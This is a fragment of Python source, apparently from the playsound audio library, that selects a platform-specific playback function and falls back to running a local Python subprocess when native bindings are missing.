sound = _canonicalizePath(sound)
class PropogatingThread(Thread):
def run(self):
self.exc = None
try:
self.ret = self._target(*self._args, **self._kwargs)
except BaseException as e:
self.exc = e
def join(self, timeout = None):
super().join(timeout)
if self.exc:
raise self.exc
return self.ret
# Check if the file exists...
if not exists(abspath(sound)):
raise PlaysoundException('Cannot find a sound with filename: ' + sound)
playsoundPath = abspath(getsourcefile(lambda: 0))
t = PropogatingThread(target = lambda: check_call([otherPython, playsoundPath, _handlePathOSX(sound) if macOS else sound]))
t.start()
if block:
t.join()
from platform import system
system = system()
if system == 'Windows':
playsound = _playsoundWin
elif system == 'Darwin':
playsound = _playsoundOSX
import sys
if sys.version_info[0] > 2:
try:
from AppKit import NSSound
except ImportError:
logger.warning("playsound is relying on a python 2 subprocess. Please use `pip3 install PyObjC` if you want playsound to run more efficiently.")
playsound = lambda sound, block = True: _playsoundAnotherPython('/System/Library/Frameworks/Python.framework/Versions/2.7/bin/python', sound, block, macOS = True)
else:
playsound = _playsoundNix
if __name__ != '__main__': # Ensure we don't infinitely recurse trying to get another python instance.
try:
import gi
gi.require_version('Gst', '1.0')
from gi.repository import Gst
except:
logger.warning("playsound is relying on another python subprocess. Please use `pip install pygobject` if you want playsound to run more efficiently.")
playsound = lambda sound, block = True: _playsoundAnotherPython('/usr/bin/python3', sound, block, macOS = False)
del system
if __name__ == '__main__':
# block is always True if you choose to run this from the command line.
from sys import argv
playsound(argv[1])
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.